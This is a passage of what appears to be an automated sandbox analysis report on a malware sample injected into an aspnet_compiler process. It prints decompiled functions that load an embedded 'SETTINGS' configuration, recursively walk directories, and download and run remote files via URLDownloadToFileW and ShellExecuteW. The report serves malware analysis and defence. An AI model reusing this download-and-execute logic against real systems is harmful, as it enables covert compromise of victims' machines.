                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443374,?,?,?,?,00442DCB,?,00000004), ref: 0045063A
                    • _wcschr.LIBVCRUNTIME ref: 004506CA
                    • _wcschr.LIBVCRUNTIME ref: 004506D8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,t3D,00000000,?), ref: 0045077B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID: t3D
                    • API String ID: 4212172061-694417703
                    • Opcode ID: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                    • Instruction ID: ba7a9897b5b485b0d00a1d7db932209b8575a85ef4c726eb57bec7d4989f050b
                    • Opcode Fuzzy Hash: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                    • Instruction Fuzzy Hash: 59610B75500706AAE724AB75CC42A6B73A8EF09705F14046FFD05DB282FB78ED488B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450CBC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E00450CBC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x45e318;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x45e320;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043A382(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                    0x00450cc1
                    0x00450cc2
                    0x00450cc9
                    0x00450d6d
                    0x00450d7b
                    0x00450d86
                    0x00450d8c
                    0x00450d91
                    0x00450d93
                    0x00450d93
                    0x00450d99
                    0x00450d9e
                    0x00450d9e
                    0x00450d88
                    0x00450d88
                    0x00000000
                    0x00450d88
                    0x00450ccf
                    0x00450cd4
                    0x00000000
                    0x00000000
                    0x00450cda
                    0x00450cdf
                    0x00450ce1
                    0x00450ce1
                    0x00450ce7
                    0x00000000
                    0x00000000
                    0x00450cec
                    0x00450d03
                    0x00450d03
                    0x00450d0c
                    0x00450d0e
                    0x00000000
                    0x00000000
                    0x00450d10
                    0x00450d15
                    0x00450d17
                    0x00450d17
                    0x00450d1d
                    0x00000000
                    0x00000000
                    0x00450d22
                    0x00450d40
                    0x00450d42
                    0x00450d65
                    0x00000000
                    0x00450d6a
                    0x00450d52
                    0x00450d5d
                    0x00000000
                    0x00000000
                    0x00450d5f
                    0x00000000
                    0x00450d5f
                    0x00450d24
                    0x00450d2c
                    0x00000000
                    0x00000000
                    0x00450d2e
                    0x00450d31
                    0x00450d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00450d39
                    0x00450d3b
                    0x00450d3d
                    0x00000000
                    0x00450d3d
                    0x00450cee
                    0x00450cf6
                    0x00000000
                    0x00000000
                    0x00450cf8
                    0x00450cfb
                    0x00450d01
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00450d01
                    0x00450d07
                    0x00450d09
                    0x00000000

                    APIs
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D55
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D7E
                    • GetACP.KERNEL32(?,?,00450FDB,?,00000000), ref: 00450D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                    • Instruction ID: f4dc62717276faaaa6782721abfec9566da5d0668c2a958c42eb904ffeb84586
                    • Opcode Fuzzy Hash: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                    • Instruction Fuzzy Hash: 2C21A73AA00205AAD7348F94D900A9B73B6EF54B52B568466ED0DDB203E736ED4DC398
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A003(void** __ecx) {
				struct HRSRC__* _t1;
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t1 = FindResourceA( *0x470d40, "SETTINGS", 0xa);
				_t7 = _t1;
				if(_t7 != 0) {
					_t3 = LockResource(LoadResource( *0x470d40, _t7));
					_t4 = SizeofResource( *0x470d40, _t7);
					 *_t5 = _t3;
					return _t4;
				}
				return _t1;
			}








                    0x0041a012
                    0x0041a014
                    0x0041a01a
                    0x0041a01e
                    0x0041a02f
                    0x0041a03e
                    0x0041a044
                    0x00000000
                    0x0041a046
                    0x0041a049

                    APIs
                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A014
                    • LoadResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A028
                    • LockResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A02F
                    • SizeofResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A03E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                    • Instruction ID: b95858df6d0456d97b6bbc8465da1c17ee9993c19fec26ac2e34289928cab2cf
                    • Opcode Fuzzy Hash: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                    • Instruction Fuzzy Hash: 26E01A76205B10ABC7311FA1BC4CD073F29F789753B100035F909D6321DA358850CA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408D1B Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00408D1B(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t89;
				signed int _t94;
				intOrPtr* _t98;
				void* _t115;
				signed int _t123;
				signed int _t125;
				void* _t142;
				signed int _t143;
				intOrPtr _t146;
				char* _t209;
				void* _t213;
				void* _t217;
				void* _t219;
				intOrPtr _t220;
				void* _t221;
				void* _t223;

				_t146 = __ecx;
				E00456328(E0045670D, _t217);
				_t220 = _t219 - 0x308;
				_push(_t142);
				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
				E004020BF(_t142, _t217 - 0x5c);
				_t77 = E004022E5(_t217 + 0x20, _t217 - 0x1c);
				_t79 = E004022AA(_t217 + 0x20, _t217 - 0x20);
				E00409291(_t217 - 0x28,  *((intOrPtr*)(E004022E5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
				_t221 = _t220 + 0xc;
				_t202 = _t217 + 8;
				_t213 = FindFirstFileW(E00401EE4(E004087F0(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
				 *(_t217 - 0x1c) = _t213;
				E00401EE9();
				if(_t213 != 0xffffffff) {
					_t143 = 0;
					__eflags = 0;
					while(1) {
						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
						__eflags = _t89;
						if(_t89 == 0) {
							break;
						}
						_t209 =  *((intOrPtr*)(_t217 - 0x18));
						__eflags =  *_t209;
						if( *_t209 == 0) {
							__eflags =  *(_t217 - 0x30c) & 0x00000010;
							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
								_t123 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, 0x4644f0);
								__eflags = _t123;
								if(_t123 != 0) {
									_t125 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
									_pop(_t170);
									__eflags = _t125;
									if(__eflags != 0) {
										_t202 = E00408876(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040415E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
										E004092BB(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
										E00401EE9();
										E00401EE9();
										_t223 = _t221 - 0x18;
										E004086D0(_t143, _t223, _t128, __eflags, _t217 + 0x20);
										_t221 = _t223 - 0x18;
										E004086D0(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
										E00408D1B(_t209, _t202, __eflags);
										E00401EE9();
									}
								}
							}
							E0040415E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
							_t98 = E004022E5(_t217 - 0x40, _t217 - 0x28);
							_t215 = E004022AA(_t217 - 0x40, _t217 - 0x24);
							E00409291(_t217 - 0x44,  *((intOrPtr*)(E004022E5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
							_t221 = _t221 + 0xc;
							__eflags = E00409114(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
							if(__eflags == 0) {
								L15:
								E00401EE9();
								_t213 =  *(_t217 - 0x1c);
								continue;
							} else {
								E00401FC2(_t217 - 0x5c, _t202, _t215, E00402097(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
								E00401FB8();
								 *(_t217 - 4) = _t143;
								_t221 = _t221 - 0x18;
								_t202 = E00402EF0(_t143, _t217 - 0x74, E0041A879(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x472ec8);
								E00402EF0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
								_push(0x66);
								_t115 = E00404A81( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
								__eflags = _t115 - 0xffffffff;
								E00401FB8();
								E00401FB8();
								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
									_t143 = 0;
									__eflags = 0;
									goto L15;
								}
								E00401EE9();
								E00401FB8();
								E00401EE9();
								E00401EE9();
								_t94 = 0;
								goto L17;
							}
						}
						FindClose(_t213);
						goto L6;
					}
					FindClose(_t213);
					E00401FB8();
					E00401EE9();
					E00401EE9();
					_t94 = 1;
					goto L17;
				} else {
					_t143 = 1;
					L6:
					E00401FB8();
					E00401EE9();
					E00401EE9();
					_t94 = _t143;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
					return _t94;
				}
			}
























                    0x00408d1b
                    0x00408d20
                    0x00408d25
                    0x00408d2b
                    0x00408d2e
                    0x00408d31
                    0x00408d37
                    0x00408d43
                    0x00408d51
                    0x00408d6d
                    0x00408d72
                    0x00408d81
                    0x00408d9e
                    0x00408da0
                    0x00408da9
                    0x00408db1
                    0x00408db7
                    0x00408db7
                    0x00408db9
                    0x00408dc1
                    0x00408dc7
                    0x00408dc9
                    0x00000000
                    0x00000000
                    0x00408dcf
                    0x00408dd2
                    0x00408dd5
                    0x00408dfd
                    0x00408e04
                    0x00408e16
                    0x00408e1d
                    0x00408e1f
                    0x00408e31
                    0x00408e37
                    0x00408e38
                    0x00408e3a
                    0x00408e5c
                    0x00408e64
                    0x00408e70
                    0x00408e78
                    0x00408e7d
                    0x00408e86
                    0x00408e8b
                    0x00408e97
                    0x00408e9e
                    0x00408ea9
                    0x00408ea9
                    0x00408e3a
                    0x00408e1f
                    0x00408eb8
                    0x00408ec4
                    0x00408ed7
                    0x00408eee
                    0x00408ef3
                    0x00408f03
                    0x00408f06
                    0x00408fbf
                    0x00408fc2
                    0x00408fc7
                    0x00000000
                    0x00408f0c
                    0x00408f24
                    0x00408f2c
                    0x00408f31
                    0x00408f34
                    0x00408f5b
                    0x00408f5f
                    0x00408f65
                    0x00408f6d
                    0x00408f72
                    0x00408f7b
                    0x00408f86
                    0x00408f8b
                    0x00408f8d
                    0x00408fb9
                    0x00408fbd
                    0x00408fbd
                    0x00000000
                    0x00408fbd
                    0x00408f92
                    0x00408f9a
                    0x00408fa2
                    0x00408faa
                    0x00408faf
                    0x00000000
                    0x00408faf
                    0x00408f06
                    0x00408dd8
                    0x00000000
                    0x00408dd8
                    0x00408fd0
                    0x00408fd9
                    0x00408fe1
                    0x00408fe9
                    0x00408fee
                    0x00000000
                    0x00408db3
                    0x00408db3
                    0x00408dde
                    0x00408de1
                    0x00408de9
                    0x00408df1
                    0x00408df6
                    0x00408ff0
                    0x00408ff3
                    0x00409000
                    0x00409000

                    APIs
                    • __EH_prolog.LIBCMT ref: 00408D20
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00408D98
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408DC1
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408DD8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNext
                    • String ID:
                    • API String ID: 1157919129-0
                    • Opcode ID: a048aa1da0b071b9debaa37a7fc6f94ec157a5e3885293fddf674d67e6c0daf6
                    • Instruction ID: b34c8ff471b712c414ce627f555fa5c2b30a51ca04011b772a5ffd3e96ebdc4c
                    • Opcode Fuzzy Hash: a048aa1da0b071b9debaa37a7fc6f94ec157a5e3885293fddf674d67e6c0daf6
                    • Instruction Fuzzy Hash: 7D8153328001099BCB15EBA1DD969EE77B8AF54308F10417FE446B71E2EF385B49CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407E80 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00407E80(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t62;
				void* _t78;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t99;
				void* _t111;
				void* _t114;
				void* _t118;
				void* _t120;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;
				intOrPtr _t175;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;

				_t165 = __edx;
				_t120 = __ecx;
				E00456328(E004566F9, _t172);
				_t175 = _t174 - 0x2b0;
				_push(_t169);
				_push(_t167);
				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
				_t118 = _t120;
				E004020BF(_t118, _t172 - 0x4c);
				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
				if(_t118 != 0) {
					_t165 = 0x46a8f0;
					_t111 = E00406E3A(0x46a8f0);
					_t188 = _t111;
					if(_t111 != 0) {
						_t185 = _t175 - 0x18;
						E004086D0(_t118, _t185, 0x46a8f0, _t188, _t172 + 8);
						_t114 = E00419F8D(_t118, _t172 - 0x34, 0x46a8f0, _t172);
						_t175 = _t185 + 0x18;
						E00401EF3(_t172 + 0x20, _t165, _t169, _t114);
						E00401EE9();
					}
				}
				_t176 = _t175 - 0x18;
				E004086D0(_t118, _t176, _t165, _t188, _t172 + 8);
				_t62 = E00419FC8(_t118, _t172 - 0x34, _t165, _t172);
				_t177 = _t176 + 0x18;
				E0040323D(_t62);
				E00401EE9();
				L004086C6(_t118, _t172 + 8, _t167, _t172, "\\");
				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
				_t166 = _t172 + 8;
				_t170 = FindFirstFileW(E00401EE4(E004087F0(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
				 *(_t172 - 0x18) = _t170;
				E00401EE9();
				if(_t170 == 0xffffffff) {
					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
					E004379F6(_t172 - 0x1c, 0x46ccd0);
				}
				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
					if( *0x470b18 != 0) {
						E00401FB8();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						_t78 = 0;
						__eflags = 0;
						L15:
						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
						return _t78;
					}
					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
						_t179 = _t177 - 0x18;
						E004020D6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
						_t180 = _t179 - 0x18;
						E004086D0(_t118, _t180, _t166, __eflags, _t172 + 0x20);
						_t88 = E0040415E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
						_t166 = _t172 + 8;
						_t89 = E00408876(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
						_t181 = _t180 - 0x14;
						E00403242(_t118, _t181, _t172, __eflags, _t89);
						E004080F9(_t118, _t172 + 8, _t167);
						_t177 = _t181 + 0x48;
						E00401EE9();
						L11:
						E00401EE9();
						continue;
					}
					if(E0043E224(_t172 - 0x288, _t172 - 0x288, 0x4644f0) == 0) {
						continue;
					}
					_t97 = E0043E224(_t172 - 0x288, _t172 - 0x288, L"..");
					_t194 = _t97;
					if(_t97 == 0) {
						continue;
					}
					_t99 = E0040415E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
					_t166 = _t172 + 8;
					E00408876(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
					E00401EE9();
					_t182 = _t177 - 0x18;
					E004020D6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
					_t183 = _t182 - 0x18;
					E004086D0(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
					_t184 = _t183 - 0x18;
					E004086D0(_t118, _t184, _t166, _t194, _t172 - 0x34);
					E00407E80(_t118, _t166, _t194);
					_t177 = _t184 + 0x48;
					goto L11;
				}
				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
				FindClose(_t170);
				E00401FB8();
				E00401EE9();
				E00401EE9();
				E00401FB8();
				_t78 = 1;
				goto L15;
			}































                    0x00407e80
                    0x00407e80
                    0x00407e85
                    0x00407e8a
                    0x00407e91
                    0x00407e92
                    0x00407e93
                    0x00407e96
                    0x00407e9b
                    0x00407ea0
                    0x00407ea6
                    0x00407ea8
                    0x00407eb0
                    0x00407eb5
                    0x00407eb7
                    0x00407eb9
                    0x00407ec2
                    0x00407eca
                    0x00407ecf
                    0x00407ed6
                    0x00407ede
                    0x00407ede
                    0x00407eb7
                    0x00407ee3
                    0x00407eec
                    0x00407ef4
                    0x00407ef9
                    0x00407f00
                    0x00407f08
                    0x00407f15
                    0x00407f1a
                    0x00407f2a
                    0x00407f44
                    0x00407f46
                    0x00407f4c
                    0x00407f54
                    0x00407f56
                    0x00407f66
                    0x00407f66
                    0x00407f6b
                    0x00407f88
                    0x004080c9
                    0x004080d1
                    0x004080d9
                    0x004080e1
                    0x004080e6
                    0x004080e6
                    0x004080e8
                    0x004080eb
                    0x004080f8
                    0x004080f8
                    0x00407f95
                    0x0040802e
                    0x00408037
                    0x0040803c
                    0x00408045
                    0x00408054
                    0x0040805a
                    0x00408060
                    0x00408065
                    0x0040806b
                    0x00408072
                    0x00408077
                    0x0040807d
                    0x00408021
                    0x00408024
                    0x00000000
                    0x00408024
                    0x00407fb0
                    0x00000000
                    0x00000000
                    0x00407fbe
                    0x00407fc5
                    0x00407fc7
                    0x00000000
                    0x00000000
                    0x00407fd3
                    0x00407fd9
                    0x00407fdf
                    0x00407fe8
                    0x00407fed
                    0x00407ff6
                    0x00407ffb
                    0x00408004
                    0x00408009
                    0x00408012
                    0x00408019
                    0x0040801e
                    0x00000000
                    0x0040801e
                    0x00408084
                    0x00408089
                    0x00408092
                    0x0040809a
                    0x004080a2
                    0x004080aa
                    0x004080af
                    0x00000000

                    APIs
                    • __EH_prolog.LIBCMT ref: 00407E85
                    • FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408089
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    • String ID:
                    • API String ID: 1771804793-0
                    • Opcode ID: 29df80f529d97faa74b0004cd5527f10f402c30c4d9ef8439814f7fe3f3b588e
                    • Instruction ID: eb919791392cef61e63247088396cac0e0337327006fc65e235cea095d5a35b6
                    • Opcode Fuzzy Hash: 29df80f529d97faa74b0004cd5527f10f402c30c4d9ef8439814f7fe3f3b588e
                    • Instruction Fuzzy Hash: 2F51517190020996CB04FBA1DD969DD77A8AF50308F50457FF846B31E2EF389B49CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406524 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E00406524(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				short* _t83;
				void* _t84;
				void* _t85;
				void* _t87;
				void* _t105;
				void* _t119;
				void* _t143;
				void* _t147;
				void* _t154;
				signed int _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t166;

				_t166 = __eflags;
				_t138 = __edx;
				_t33 = E00401F8B( &_a8);
				_push(0xffffffff);
				_t87 = 4;
				_push(_t87);
				_push( &_v28);
				E00404182( &_a8);
				_t158 = (_t155 & 0xfffffff8) - 0x2c;
				E004020D6(_t87, _t158, __edx, _t166, 0x472ec8);
				_t159 = _t158 - 0x18;
				E004020D6(_t87, _t159, __edx, _t166,  &_v44);
				E0041A976( &_v84, __edx);
				_t160 = _t159 + 0x30;
				_t147 =  *_t33 - _t87;
				if(_t147 == 0) {
					_t143 = 0;
					E00401E45( &_v64, __edx, _t154, __eflags, 0);
					__eflags = E00405AE5("F");
					if(__eflags == 0) {
						E00401E45( &_v68, "F", _t154, __eflags, 0);
						_t138 = "M";
						__eflags = E00405AE5("M");
						if(__eflags == 0) {
							L23:
							E00401E6D( &_v64, _t138);
							E00401FB8();
							E00401FB8();
							return 0;
						}
						_v68 = 0;
						_t50 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
						_t138 =  &_v76;
						__eflags = E0041A551(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t105 = _t160 - 0x18;
							_push("2");
							L22:
							E00402073(_t87, _t105, _t138, _t154);
							_push(0xb3);
							E00404A81(_a4, _t138, __eflags);
							goto L23;
						}
						_t138 = _v72;
						_t54 = E00417456(0x470b38);
						L0043A61B(_v72);
						_t162 = _t160 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t105 = _t162;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 2));
					_t59 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 3));
					_t138 =  *_t57;
					E0040CF38( &_v60,  *_t57, _t59);
					_t63 = E00401F8B(E00401E45( &_v72,  *_t57, _t154, __eflags, _t87));
					__imp__URLDownloadToFileW(0, _t63, E00401EE4( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(E00401F8B(E00401E45( &_v84, _t138, _t154, _t170, 1)))) == 0) {
							_t119 = _t160 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t143, L"open", E00401EE4( &_v72), _t143, _t143, 1);
							_t119 = _t160 - 0x18;
							_t172 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00402073(_t87, _t119, _t138, _t154);
						_push(0xb3);
						E00404A81(_a4, _t138, _t172);
						E00401EE9();
						goto L23;
					}
					L14:
					_t119 = _t160 - 0x18;
					_push("2");
					goto L17;
				}
				_t168 = _t147 != 1;
				if(_t147 != 1) {
					goto L23;
				}
				_t143 = 0;
				E00401E45( &_v64, __edx, _t154, _t168, 0);
				_t72 = E00405AE5("F");
				_t169 = _t72;
				if(_t72 == 0) {
					E00401E45( &_v68, "F", _t154, __eflags, 0);
					_t138 = "M";
					__eflags = E00405AE5("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t138 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
						_t77 = E00417456(0x470b38);
						_t162 = _t160 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 2));
				E0040CF38( &_v60,  *_t79, E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 3)));
				_t83 = E00401EE4( &_v60);
				_t84 = E00401E45( &_v72,  *_t79, _t154, _t169, _t87);
				_t138 = _t83;
				_t85 = E0041AE6B(_t84, _t83);
				_t170 = _t85 - 1;
				if(_t85 != 1) {
					goto L14;
				}
				goto L4;
			}







































                    0x00406524
                    0x00406524
                    0x00406533
                    0x00406538
                    0x0040653c
                    0x00406542
                    0x00406547
                    0x00406548
                    0x0040654d
                    0x00406557
                    0x0040655c
                    0x00406566
                    0x0040656f
                    0x00406574
                    0x00406577
                    0x00406579
                    0x004066a2
                    0x004066a9
                    0x004066be
                    0x004066c0
                    0x00406760
                    0x00406765
                    0x00406771
                    0x00406773
                    0x004067e1
                    0x004067e5
                    0x004067ee
                    0x004067f6
                    0x00406803
                    0x00406803
                    0x00406779
                    0x0040678a
                    0x0040678f
                    0x0040679b
                    0x0040679d
                    0x004067c8
                    0x004067ca
                    0x004067cf
                    0x004067cf
                    0x004067d7
                    0x004067dc
                    0x00000000
                    0x004067dc
                    0x0040679f
                    0x004067a8
                    0x004067b4
                    0x004067ba
                    0x004067bd
                    0x0040668a
                    0x0040668a
                    0x0040668c
                    0x00406698
                    0x0040668e
                    0x0040668e
                    0x0040668e
                    0x00000000
                    0x0040668c
                    0x004066cf
                    0x004066e3
                    0x004066e8
                    0x004066ef
                    0x0040670d
                    0x00406714
                    0x0040671a
                    0x0040671c
                    0x00406601
                    0x00406616
                    0x00406738
                    0x0040673a
                    0x0040661c
                    0x00406630
                    0x00406639
                    0x0040663b
                    0x0040663e
                    0x0040672e
                    0x00406644
                    0x00406644
                    0x00406644
                    0x0040663e
                    0x0040673f
                    0x0040673f
                    0x00406747
                    0x0040674c
